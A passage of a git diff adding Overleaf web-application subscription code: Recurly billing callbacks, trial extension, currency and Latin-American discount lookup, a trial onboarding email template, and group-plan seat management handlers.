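+      // A billing-info update is the natural moment to retry collection:
+      // attemptPaypalInvoiceCollection (see SubscriptionHandler) re-attempts
+      // past-due invoices once the customer has fixed their payment details.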
recurlyAccountCode = eventData.account.account_code + SubscriptionHandler.attemptPaypalInvoiceCollection( + recurlyAccountCode, + function (err) { + if (err) { + return next(err) + } + res.sendStatus(200) + } + ) + } else { + res.sendStatus(200) + } +} + +async function extendTrial(req, res) { + const user = SessionManager.getSessionUser(req.session) + const { subscription } = + await LimitationsManager.promises.userHasSubscription(user) + + const allowed = ( + await Modules.promises.hooks.fire('userCanExtendTrial', user) + )?.[0] + if (!allowed) { + logger.warn({ userId: user._id }, 'user can not extend trial') + return res.sendStatus(403) + } + + try { + await SubscriptionHandler.promises.extendTrial(subscription, 14) + AnalyticsManager.recordEventForSession( + req.session, + 'subscription-trial-extended' + ) + } catch (error) { + return res.sendStatus(500) + } + res.sendStatus(200) +} + +function recurlyNotificationParser(req, res, next) { + let xml = '' + req.on('data', chunk => (xml += chunk)) + req.on('end', () => + RecurlyWrapper._parseXml(xml, function (error, body) { + if (error) { + return next(error) + } + req.body = body + next() + }) + ) +} + +async function refreshUserFeatures(req, res) { + const { user_id: userId } = req.params + await FeaturesUpdater.promises.refreshFeatures(userId, 'acceptance-test') + res.sendStatus(200) +} + +async function redirectToHostedPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { pageType } = req.params + const url = + await SubscriptionViewModelBuilder.promises.getRedirectToHostedPage( + userId, + pageType + ) + logger.warn({ userId, pageType }, 'redirecting to recurly hosted page') + res.redirect(url) +} + +async function getRecommendedCurrency(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + let ip = req.ip + if ( + req.query?.ip && + (await AuthorizationManager.promises.isUserSiteAdmin(userId)) + ) { + ip = req.query.ip + } + const currencyLookup = await GeoIpLookup.promises.getCurrencyCode(ip) + let countryCode = currencyLookup.countryCode + const recommendedCurrency = currencyLookup.currencyCode + + let currency = null + const queryCurrency = req.query.currency?.toUpperCase() + if (queryCurrency && GeoIpLookup.isValidCurrencyParam(queryCurrency)) { + currency = queryCurrency + } else if (recommendedCurrency) { + currency = recommendedCurrency + } + + const queryCountryCode = req.query.countryCode?.toUpperCase() + + // only enable countryCode testing flag on staging or dev environments + if (queryCountryCode && process.env.NODE_ENV !== 'production') { + countryCode = queryCountryCode + } + + return { + currency, + recommendedCurrency, + countryCode, + } +} + +async function getLatamCountryBannerDetails(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + let ip = req.ip + if ( + req.query?.ip && + (await AuthorizationManager.promises.isUserSiteAdmin(userId)) + ) { + ip = req.query.ip + } + const currencyLookup = await GeoIpLookup.promises.getCurrencyCode(ip) + const countryCode = currencyLookup.countryCode + const latamCountryBannerDetails = {} + + switch (countryCode) { + case `MX`: + latamCountryBannerDetails.latamCountryFlag = '🇲🇽' + latamCountryBannerDetails.country = 'Mexico' + latamCountryBannerDetails.discount = '25%' + latamCountryBannerDetails.currency = 'Mexican Pesos' + break + case `CO`: + latamCountryBannerDetails.latamCountryFlag = '🇨🇴' + latamCountryBannerDetails.country = 'Colombia' + latamCountryBannerDetails.discount = '60%' + 
latamCountryBannerDetails.currency = 'Colombian Pesos' + break + case `CL`: + latamCountryBannerDetails.latamCountryFlag = '🇨🇱' + latamCountryBannerDetails.country = 'Chile' + latamCountryBannerDetails.discount = '30%' + latamCountryBannerDetails.currency = 'Chilean Pesos' + break + case `PE`: + latamCountryBannerDetails.latamCountryFlag = '🇵🇪' + latamCountryBannerDetails.country = 'Peru' + latamCountryBannerDetails.currency = 'Peruvian Soles' + latamCountryBannerDetails.discount = '40%' + break + } + + return latamCountryBannerDetails +} + +/** + * There are two sets of group plans: legacy plans and consolidated plans, + * and their naming conventions differ. + * This helper method computes the name of legacy group plans to ensure + * consistency with the naming of consolidated group plans. + * + * @param {string} planName + * @param {string} planCode + * @return {string} + */ + +function getPlanNameForDisplay(planName, planCode) { + const match = planCode.match( + /^group_(collaborator|professional)_\d+_(enterprise|educational)$/ + ) + + if (!match) return planName + + const [, type, category] = match + const prefix = type === 'collaborator' ? 'Standard' : 'Professional' + const suffix = category === 'educational' ? ' Educational' : '' + + return `Overleaf ${prefix} Group${suffix}` +} + +/** + * Build a subscription change preview for display purposes + * + * @param {SubscriptionChangeDescription} subscriptionChangeDescription A description of the change for the frontend + * @param {PaymentProviderSubscriptionChange} subscriptionChange The subscription change object coming from Recurly + * @param {PaymentMethod} paymentMethod The payment method associated to the user + * @return {SubscriptionChangePreview} + */ +function makeChangePreview( + subscriptionChangeDescription, + subscriptionChange, + paymentMethod +) { + const subscription = subscriptionChange.subscription + const nextPlan = PlansLocator.findLocalPlanInSettings( + subscriptionChange.nextPlanCode + ) + return { + change: subscriptionChangeDescription, + currency: subscription.currency, + immediateCharge: { ...subscriptionChange.immediateCharge }, + paymentMethod: paymentMethod.toString(), + nextPlan: { + annual: nextPlan.annual ?? 
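+        // plans without an `annual` flag are treated as monthly here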
false, + }, + nextInvoice: { + date: subscription.periodEnd.toISOString(), + plan: { + name: getPlanNameForDisplay( + subscriptionChange.nextPlanName, + subscriptionChange.nextPlanCode + ), + amount: subscriptionChange.nextPlanPrice, + }, + addOns: subscriptionChange.nextAddOns.map(addOn => ({ + code: addOn.code, + name: addOn.name, + quantity: addOn.quantity, + unitAmount: addOn.unitPrice, + amount: addOn.preTaxTotal, + })), + subtotal: subscriptionChange.subtotal, + tax: { + rate: subscription.taxRate, + amount: subscriptionChange.tax, + }, + total: subscriptionChange.total, + }, + } +} + +module.exports = { + userSubscriptionPage: expressify(userSubscriptionPage), + successfulSubscription: expressify(successfulSubscription), + cancelSubscription, + pauseSubscription, + resumeSubscription, + canceledSubscription: expressify(canceledSubscription), + cancelV1Subscription, + previewSubscription: expressify(previewSubscription), + cancelPendingSubscriptionChange, + updateAccountEmailAddress, + reactivateSubscription, + recurlyCallback, + extendTrial: expressify(extendTrial), + recurlyNotificationParser, + refreshUserFeatures: expressify(refreshUserFeatures), + redirectToHostedPage: expressify(redirectToHostedPage), + previewAddonPurchase: expressify(previewAddonPurchase), + purchaseAddon, + removeAddon, + makeChangePreview, + getRecommendedCurrency, + getLatamCountryBannerDetails, + getPlanNameForDisplay, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionEmailBuilder.js b/services/web/app/src/Features/Subscription/SubscriptionEmailBuilder.js new file mode 100644 index 0000000..bafdee4 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionEmailBuilder.js @@ -0,0 +1,165 @@ +const EmailBuilder = require('../Email/EmailBuilder') +const EmailMessageHelper = require('../Email/EmailMessageHelper') +const settings = require('@overleaf/settings') + +EmailBuilder.templates.trialOnboarding = EmailBuilder.NoCTAEmailTemplate({ + subject(opts) { + return `Welcome to your Overleaf ${opts.planName} plan trial` + }, + title(opts) { + return `Welcome to your Overleaf ${opts.planName} plan trial` + }, + greeting() { + return 'Hello,' + }, + message(opts, isPlainText) { + const invitingNamedCollaborators = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Sharing_a_project?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=invitelink#Inviting_named_collaborators`, + isPlainText + ) + const increasedCompileTimeout = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/What_is_the_maximum_compilation_time,_file_number_and_project_size_allowed_on_free_vs_paid_plans%3F?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=compilelink`, + isPlainText + ) + const realTimeTrackChanges = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Track_Changes_in_Overleaf?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=trackchangeslink`, + isPlainText + ) + const history = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/latex/Using_the_History_feature?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=historylink`, + isPlainText + ) + const versioning = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Can_I_save_versions_of_my_work%3F?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=versioninglink`, + isPlainText + ) + 
const advancedReferenceSearch = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/How_to_search_for_references_in_an_Overleaf_project?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=adrefsearchlink`, + isPlainText + ) + const referenceManagerSync = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/How_to_link_your_Overleaf_account_to_Mendeley_and_Zotero?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=refmansynclink`, + isPlainText + ) + const dropboxSync = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Dropbox_Synchronization?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=dropboxlink`, + isPlainText + ) + const gitSync = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Using_Git_and_GitHub?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=gitgithublink`, + isPlainText + ) + const symbolPalette = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Using_the_Symbol_Palette_in_Overleaf#:~:text=To%20open%20the%20Symbol%20Palette,the%20handle%20up%20and%20down.`, + isPlainText + ) + const latexTutorials = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/latex/Learn_LaTeX_in_30_minutes?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=latextutorialslink`, + isPlainText + ) + const knowledgeBase = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=learnlink`, + isPlainText + ) + const technicalArticles = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/latex/Articles?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=articleslink`, + isPlainText + ) + const webinars = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/events/webinars?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=webinarslink`, + isPlainText + ) + + const cancel = EmailMessageHelper.displayLink( + 'cancel at any time', + `${settings.siteUrl}/learn/how-to/Canceling_Subscription?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=cancellink`, + isPlainText + ) + + const feedback = EmailMessageHelper.displayLink( + 'hear your feedback', + `https://docs.google.com/forms/d/e/1FAIpQLSfMbbh_z-9-dZ3YnrDCyNpNxFPGA492ZSallKOt8WWp2nx7kg/viewform?usp=sf_link/viewform`, + isPlainText + ) + + const unsubscribe = EmailMessageHelper.displayLink( + 'here', + `${settings.siteUrl}/user/email-preferences`, + isPlainText + ) + + const canInviteMoreNamedCollaborators = + opts.features.collaborators === -1 || + opts.features.collaborators > settings.defaultFeatures.collaborators + + let n = 1 + return [ + `Welcome to your Overleaf Premium Features Trial! We really appreciate your support of Overleaf and are excited for you to use our premium features and get the most out of your trial.`, + `<b>During your trial period, be sure to check out these premium features: </b>`, + + ...(canInviteMoreNamedCollaborators + ? [ + `${n++}. <b>Invite more collaborators</b>: You can now invite named collaborators to your project via the ‘share’ menu in your project (with read-only or edit access). Simply add their email address and an email invitation will be sent to them. 
You can remove these named collaborators at any time via the same ‘share’ menu.`, + `<ul><li> Inviting Named Collaborators: ${invitingNamedCollaborators}</li></ul>`, + ] + : []), + + `${n++}. <b>Increased compile timeout</b>: You now have more time for compilation (to generate a PDF of your document) before receiving a timeout error message.`, + `<ul><li> Compile Timeout: ${increasedCompileTimeout}</li></ul>`, + + ...(opts.features.trackChanges + ? [ + `${n++}. <b>Real-time track changes</b>: The track changes mode lets you see exactly what has been changed by your collaborators, and allows you to accept or reject each individual change. `, + `<ul><li> Track Changes: ${realTimeTrackChanges}</li></ul>`, + ] + : []), + + `${n++}. <b>Full document history and versioning</b>: View the entire history of your project with the ability to revert to previous versions of your document from your project history (versus only 24 hours of history availability on a free Overleaf account). No more fear of losing work or making changes you can’t undo. `, + `<ul><li> History: ${history}</li> + <li>Versioning: ${versioning}</li></ul>`, + + `${n++}. <b>Advanced reference search</b>: You can search by citation key, and our premium feature allows the added ability to search by author, title, year, or journal.`, + `<ul><li>Advanced Reference Search: ${advancedReferenceSearch}</li></ul>`, + + `${n++}. <b>Reference manager sync </b>: You can link your Mendeley and Zotero accounts to your Overleaf account, allowing you to import your reference library and keep your Overleaf document in sync with the references stored in Mendeley / Zotero.`, + `<ul><li> Reference Manager Sync: ${referenceManagerSync}</li></ul>`, + + `${n++}. <b>Dropbox Sync</b>: You can link your Dropbox account to your Overleaf account, allowing 2-way integration with Dropbox `, + `<ul><li> Dropbox Sync: ${dropboxSync}</li></ul>`, + + `${n++}. <b>Git and GitHub integration</b>: You can configure your Overleaf project to sync directly with a repository on GitHub, or you can use raw git access. This allows you to work offline and sync your files whenever you come back online. You can also use our Overleaf Git Bridge integration, which lets you git clone, push and pull changes between the online Overleaf editor, and your local offline git repository.`, + `<ul><li> Git, GitHub and Git Bridge: ${gitSync}</li></ul>`, + + `${n++}. <b>Symbol Palette</b>: A quick and convenient tool to insert math symbols into your document.`, + `<ul><li> Symbol Palette: ${symbolPalette}</li></ul>`, + + `${n++}. <b>Online tutorials and knowledge base</b>: We have an extensive online knowledge base providing a wide range of platform guidance, LaTeX tutorials, technical articles, and webinars.`, + `<ul><li>LaTeX tutorials: ${latexTutorials}</li> + <li>Knowledge base: ${knowledgeBase}</li> + <li>Technical articles: ${technicalArticles}</li> + <li>Webinars: ${webinars}</li></ul>`, + + `Your trial will last for seven days from when you started it, and you can ${cancel} via your subscription page on your dashboard. If you’d like to continue your subscription after your trial, you’re all set!`, + + `Please let us know if we can provide any additional support or answer any questions - and we’d love to ${feedback}!`, + `Thanks again for supporting Overleaf - Happy TeXing!`, + `The Overleaf Team <hr>`, + + `You're receiving this email because you've recently signed up for an Overleaf premium trial. 
If you've previously subscribed to emails about product offers and company news and events, you can unsubscribe ${unsubscribe}.`,
+    ]
+  },
+})
diff --git a/services/web/app/src/Features/Subscription/SubscriptionEmailHandler.js b/services/web/app/src/Features/Subscription/SubscriptionEmailHandler.js
new file mode 100644
index 0000000..c0b32d7
--- /dev/null
+++ b/services/web/app/src/Features/Subscription/SubscriptionEmailHandler.js
@@ -0,0 +1,29 @@
+const EmailHandler = require('../Email/EmailHandler')
+const UserGetter = require('../User/UserGetter')
+require('./SubscriptionEmailBuilder')
+const PlansLocator = require('./PlansLocator')
+const Settings = require('@overleaf/settings')
+
+const SubscriptionEmailHandler = {
+  async sendTrialOnboardingEmail(userId, planCode) {
+    const user = await UserGetter.promises.getUser(userId, {
+      email: 1,
+    })
+
+    const plan = PlansLocator.findLocalPlanInSettings(planCode)
+    if (!plan) {
+      throw new Error('unknown paid plan: ' + planCode)
+    }
+    if (Settings.enableOnboardingEmails) {
+      const emailOptions = {
+        to: user.email,
+        sendingUser_id: userId,
+        planName: plan.name,
+        features: plan.features,
+      }
+      await EmailHandler.promises.sendEmail('trialOnboarding', emailOptions)
+    }
+  },
+}
+
+module.exports = SubscriptionEmailHandler
diff --git a/services/web/app/src/Features/Subscription/SubscriptionFormatters.js b/services/web/app/src/Features/Subscription/SubscriptionFormatters.js
new file mode 100644
index 0000000..1953f33
--- /dev/null
+++ b/services/web/app/src/Features/Subscription/SubscriptionFormatters.js
@@ -0,0 +1,20 @@
+const dateformat = require('dateformat')
+
+function formatDateTime(date) {
+  if (!date) {
+    return null
+  }
+  return dateformat(date, 'mmmm dS, yyyy h:MM TT Z', true)
+}
+
+function formatDate(date) {
+  if (!date) {
+    return null
+  }
+  return dateformat(date, 'mmmm dS, yyyy', true)
+}
+
+module.exports = {
+  formatDateTime,
+  formatDate,
+}
diff --git a/services/web/app/src/Features/Subscription/SubscriptionGroupController.mjs b/services/web/app/src/Features/Subscription/SubscriptionGroupController.mjs
new file mode 100644
index 0000000..14d73f9
--- /dev/null
+++ b/services/web/app/src/Features/Subscription/SubscriptionGroupController.mjs
@@ -0,0 +1,407 @@
+// @ts-check
+import SubscriptionGroupHandler from './SubscriptionGroupHandler.js'
+
+import OError from '@overleaf/o-error'
+import logger from '@overleaf/logger'
+import SubscriptionLocator from './SubscriptionLocator.js'
+import SessionManager from '../Authentication/SessionManager.js'
+import UserAuditLogHandler from '../User/UserAuditLogHandler.js'
+import { expressify } from '@overleaf/promise-utils'
+import Modules from '../../infrastructure/Modules.js'
+import UserGetter from '../User/UserGetter.js'
+import { Subscription } from '../../models/Subscription.js'
+import { isProfessionalGroupPlan } from './PlansHelper.mjs'
+import {
+  MissingBillingInfoError,
+  ManuallyCollectedError,
+  PendingChangeError,
+  InactiveError,
+  SubtotalLimitExceededError,
+} from './Errors.js'
+import RecurlyClient from './RecurlyClient.js'
+
+/**
+ * @import { Subscription } from "../../../../types/subscription/dashboard/subscription.js"
+ */
+
+/**
+ * @param {import("express").Request} req
+ * @param {import("express").Response} res
+ * @returns {Promise<void>}
+ */
+async function removeUserFromGroup(req, res) {
+  const subscription = req.entity
+  const userToRemoveId = req.params.user_id
+  const loggedInUserId = SessionManager.getLoggedInUserId(req.session)
+  const subscriptionId =
subscription._id + logger.debug( + { subscriptionId, userToRemoveId }, + 'removing user from group subscription' + ) + + await _removeUserFromGroup(req, res, { + userToRemoveId, + loggedInUserId, + subscription, + }) +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @returns {Promise<void>} + */ +async function removeSelfFromGroup(req, res) { + const userToRemoveId = SessionManager.getLoggedInUserId(req.session) + const subscription = await SubscriptionLocator.promises.getSubscription( + req.query.subscriptionId + ) + + await _removeUserFromGroup(req, res, { + userToRemoveId, + loggedInUserId: userToRemoveId, + subscription, + }) +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @param {string} userToRemoveId + * @param {string} loggedInUserId + * @param {Subscription} subscription + * @returns {Promise<void>} + * @private + */ +async function _removeUserFromGroup( + req, + res, + { userToRemoveId, loggedInUserId, subscription } +) { + const subscriptionId = subscription._id + + const groupSSOActive = ( + await Modules.promises.hooks.fire('hasGroupSSOEnabled', subscription) + )?.[0] + if (groupSSOActive) { + await Modules.promises.hooks.fire( + 'unlinkUserFromGroupSSO', + userToRemoveId, + subscriptionId + ) + } + + try { + await UserAuditLogHandler.promises.addEntry( + userToRemoveId, + 'remove-from-group-subscription', + loggedInUserId, + req.ip, + { subscriptionId } + ) + } catch (auditLogError) { + throw OError.tag(auditLogError, 'error adding audit log entry', { + userToRemoveId, + subscriptionId, + }) + } + + try { + await SubscriptionGroupHandler.promises.removeUserFromGroup( + subscriptionId, + userToRemoveId + ) + } catch (error) { + logger.err( + { err: error, userToRemoveId, subscriptionId }, + 'error removing self from group' + ) + return res.sendStatus(500) + } + + res.sendStatus(200) +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @returns {Promise<void>} + */ +async function addSeatsToGroupSubscription(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const { subscription, recurlySubscription, plan } = + await SubscriptionGroupHandler.promises.getUsersGroupSubscriptionDetails( + userId + ) + await SubscriptionGroupHandler.promises.ensureFlexibleLicensingEnabled(plan) + await SubscriptionGroupHandler.promises.ensureSubscriptionCollectionMethodIsNotManual( + recurlySubscription + ) + await SubscriptionGroupHandler.promises.ensureSubscriptionHasNoPendingChanges( + recurlySubscription + ) + // Check if the user has missing billing details + await RecurlyClient.promises.getPaymentMethod(userId) + await SubscriptionGroupHandler.promises.ensureSubscriptionIsActive( + subscription + ) + + res.render('subscriptions/add-seats', { + subscriptionId: subscription._id, + groupName: subscription.teamName, + totalLicenses: subscription.membersLimit, + isProfessional: isProfessionalGroupPlan(subscription), + }) + } catch (error) { + if (error instanceof MissingBillingInfoError) { + return res.redirect( + '/user/subscription/group/missing-billing-information' + ) + } + + if (error instanceof ManuallyCollectedError) { + return res.redirect( + '/user/subscription/group/manually-collected-subscription' + ) + } + + if (error instanceof PendingChangeError || error instanceof InactiveError) { + return res.redirect('/user/subscription') + } + + logger.err( + { error }, + 'error while getting users group 
subscription details' + ) + + return res.redirect('/user/subscription') + } +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @returns {Promise<void>} + */ +async function previewAddSeatsSubscriptionChange(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const preview = + await SubscriptionGroupHandler.promises.previewAddSeatsSubscriptionChange( + userId, + req.body.adding + ) + + res.json(preview) + } catch (error) { + if ( + error instanceof MissingBillingInfoError || + error instanceof ManuallyCollectedError || + error instanceof PendingChangeError || + error instanceof InactiveError + ) { + return res.status(422).end() + } + + if (error instanceof SubtotalLimitExceededError) { + return res.status(422).json({ + code: 'subtotal_limit_exceeded', + adding: req.body.adding, + }) + } + + logger.err( + { error }, + 'error trying to preview "add seats" subscription change' + ) + + return res.status(500).end() + } +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @returns {Promise<void>} + */ +async function createAddSeatsSubscriptionChange(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const create = + await SubscriptionGroupHandler.promises.createAddSeatsSubscriptionChange( + userId, + req.body.adding + ) + + res.json(create) + } catch (error) { + if ( + error instanceof MissingBillingInfoError || + error instanceof ManuallyCollectedError || + error instanceof PendingChangeError || + error instanceof InactiveError + ) { + return res.status(422).end() + } + + if (error instanceof SubtotalLimitExceededError) { + return res.status(422).json({ + code: 'subtotal_limit_exceeded', + adding: req.body.adding, + }) + } + + logger.err( + { error }, + 'error trying to create "add seats" subscription change' + ) + + return res.status(500).end() + } +} + +async function submitForm(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const userEmail = await UserGetter.promises.getUserEmail(userId) + const { adding } = req.body + + const messageLines = [`\n**Overleaf Sales Contact Form:**`] + messageLines.push('**Subject:** Self-Serve Group User Increase Request') + messageLines.push(`**Estimated Number of Users:** ${adding}`) + messageLines.push( + `**Message:** This email has been generated on behalf of user with email **${userEmail}** ` + + 'to request an increase in the total number of users for their subscription.' 
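+  // With adding = 5 and userEmail 'user@example.com' (hypothetical values),
+  // messageFormatted below comes out as blank-line-separated Markdown:
+  //
+  //   **Overleaf Sales Contact Form:**
+  //
+  //   **Subject:** Self-Serve Group User Increase Request
+  //
+  //   **Estimated Number of Users:** 5
+  //
+  //   **Message:** This email has been generated on behalf of user with
+  //   email **user@example.com** to request an increase in the total number
+  //   of users for their subscription.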
+ ) + const messageFormatted = messageLines.join('\n\n') + + const data = { + email: userEmail, + subject: 'Sales Contact Form', + message: messageFormatted, + inbox: 'sales', + } + + await Modules.promises.hooks.fire('sendSupportRequest', data) + res.sendStatus(204) +} + +async function subscriptionUpgradePage(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const changePreview = + await SubscriptionGroupHandler.promises.getGroupPlanUpgradePreview(userId) + const olSubscription = await Subscription.findOne({ + admin_id: userId, + }).exec() + res.render('subscriptions/upgrade-group-subscription-react', { + changePreview, + totalLicenses: olSubscription.membersLimit, + groupName: olSubscription.teamName, + }) + } catch (error) { + if (error instanceof MissingBillingInfoError) { + return res.redirect( + '/user/subscription/group/missing-billing-information' + ) + } + + if (error instanceof ManuallyCollectedError) { + return res.redirect( + '/user/subscription/group/manually-collected-subscription' + ) + } + + if (error instanceof SubtotalLimitExceededError) { + return res.redirect('/user/subscription/group/subtotal-limit-exceeded') + } + + if (error instanceof PendingChangeError || error instanceof InactiveError) { + return res.redirect('/user/subscription') + } + + logger.err({ error }, 'error loading upgrade subscription page') + + return res.redirect('/user/subscription') + } +} + +async function upgradeSubscription(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + await SubscriptionGroupHandler.promises.upgradeGroupPlan(userId) + return res.sendStatus(200) + } catch (error) { + logger.err({ error }, 'error trying to upgrade subscription') + return res.sendStatus(500) + } +} + +async function missingBillingInformation(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + res.render('subscriptions/missing-billing-information', { + groupName: subscription.teamName, + }) + } catch (error) { + logger.err( + { error }, + 'error trying to render missing billing information page' + ) + return res.render('/user/subscription') + } +} + +async function manuallyCollectedSubscription(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + res.render('subscriptions/manually-collected-subscription', { + groupName: subscription.teamName, + }) + } catch (error) { + logger.err( + { error }, + 'error trying to render manually collected subscription page' + ) + return res.render('/user/subscription') + } +} + +async function subtotalLimitExceeded(req, res) { + try { + const userId = SessionManager.getLoggedInUserId(req.session) + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + res.render('subscriptions/subtotal-limit-exceeded', { + groupName: subscription.teamName, + }) + } catch (error) { + logger.err({ error }, 'error trying to render subtotal limit exceeded page') + return res.render('/user/subscription') + } +} + +export default { + removeUserFromGroup: expressify(removeUserFromGroup), + removeSelfFromGroup: expressify(removeSelfFromGroup), + addSeatsToGroupSubscription: expressify(addSeatsToGroupSubscription), + submitForm: expressify(submitForm), + previewAddSeatsSubscriptionChange: expressify( + previewAddSeatsSubscriptionChange + ), + 
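+  // expressify wraps each async handler so a rejected promise is forwarded
+  // to Express's next() rather than becoming an unhandled rejection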
createAddSeatsSubscriptionChange: expressify( + createAddSeatsSubscriptionChange + ), + subscriptionUpgradePage: expressify(subscriptionUpgradePage), + upgradeSubscription: expressify(upgradeSubscription), + missingBillingInformation: expressify(missingBillingInformation), + manuallyCollectedSubscription: expressify(manuallyCollectedSubscription), + subtotalLimitExceeded: expressify(subtotalLimitExceeded), +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionGroupHandler.js b/services/web/app/src/Features/Subscription/SubscriptionGroupHandler.js new file mode 100644 index 0000000..b313cb6 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionGroupHandler.js @@ -0,0 +1,326 @@ +const { callbackify } = require('util') +const SubscriptionUpdater = require('./SubscriptionUpdater') +const SubscriptionLocator = require('./SubscriptionLocator') +const SubscriptionController = require('./SubscriptionController') +const { Subscription } = require('../../models/Subscription') +const RecurlyClient = require('./RecurlyClient') +const PlansLocator = require('./PlansLocator') +const SubscriptionHandler = require('./SubscriptionHandler') +const GroupPlansData = require('./GroupPlansData') +const { MEMBERS_LIMIT_ADD_ON_CODE } = require('./PaymentProviderEntities') +const { + ManuallyCollectedError, + PendingChangeError, + InactiveError, +} = require('./Errors') + +async function removeUserFromGroup(subscriptionId, userIdToRemove) { + await SubscriptionUpdater.promises.removeUserFromGroup( + subscriptionId, + userIdToRemove + ) +} + +async function replaceUserReferencesInGroups(oldId, newId) { + await Subscription.updateOne({ admin_id: oldId }, { admin_id: newId }).exec() + + await _replaceInArray(Subscription, 'manager_ids', oldId, newId) + await _replaceInArray(Subscription, 'member_ids', oldId, newId) +} + +async function isUserPartOfGroup(userId, subscriptionId) { + const subscription = + await SubscriptionLocator.promises.getSubscriptionByMemberIdAndId( + userId, + subscriptionId + ) + + return !!subscription +} + +async function getTotalConfirmedUsersInGroup(subscriptionId) { + const subscription = + await SubscriptionLocator.promises.getSubscription(subscriptionId) + + return subscription?.member_ids?.length +} + +async function _replaceInArray(model, property, oldValue, newValue) { + // Mongo won't let us pull and addToSet in the same query, so do it in + // two. Note we need to add first, since the query is based on the old user. 
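+  // Sketch of the two operations issued when replacing user A with user B in
+  // `manager_ids` (A and B being hypothetical ids):
+  //   updateMany({ manager_ids: A }, { $addToSet: { manager_ids: B } })
+  //   updateMany({ manager_ids: A }, { $pull: { manager_ids: A } })
+  // Pulling first would remove A, and the $addToSet query (which still
+  // matches on the old user A) would then find nothing to update.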
+ const query = {} + query[property] = oldValue + + const setNewValue = {} + setNewValue[property] = newValue + + const setOldValue = {} + setOldValue[property] = oldValue + + await model.updateMany(query, { $addToSet: setNewValue }) + await model.updateMany(query, { $pull: setOldValue }) +} + +async function ensureFlexibleLicensingEnabled(plan) { + if (!plan?.canUseFlexibleLicensing) { + throw new Error('The group plan does not support flexible licensing') + } +} + +async function ensureSubscriptionIsActive(subscription) { + if (subscription?.recurlyStatus?.state !== 'active') { + throw new InactiveError('The subscription is not active', { + subscriptionId: subscription._id.toString(), + }) + } +} + +async function ensureSubscriptionCollectionMethodIsNotManual( + recurlySubscription +) { + if (recurlySubscription.isCollectionMethodManual) { + throw new ManuallyCollectedError( + 'This subscription is being collected manually', + { + recurlySubscription_id: recurlySubscription.id, + } + ) + } +} + +async function ensureSubscriptionHasNoPendingChanges(recurlySubscription) { + if (recurlySubscription.pendingChange) { + throw new PendingChangeError('This subscription has a pending change', { + recurlySubscription_id: recurlySubscription.id, + }) + } +} + +async function getUsersGroupSubscriptionDetails(userId) { + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + if (!subscription) { + throw new Error('No subscription was found') + } + + if (!subscription.groupPlan) { + throw new Error('User subscription is not a group plan') + } + + const plan = PlansLocator.findLocalPlanInSettings(subscription.planCode) + + const recurlySubscription = await RecurlyClient.promises.getSubscription( + subscription.recurlySubscription_id + ) + + return { + userId, + subscription, + recurlySubscription, + plan, + } +} + +async function _addSeatsSubscriptionChange(userId, adding) { + const { subscription, recurlySubscription, plan } = + await getUsersGroupSubscriptionDetails(userId) + await ensureFlexibleLicensingEnabled(plan) + await ensureSubscriptionIsActive(subscription) + await ensureSubscriptionCollectionMethodIsNotManual(recurlySubscription) + await ensureSubscriptionHasNoPendingChanges(recurlySubscription) + + const currentAddonQuantity = + 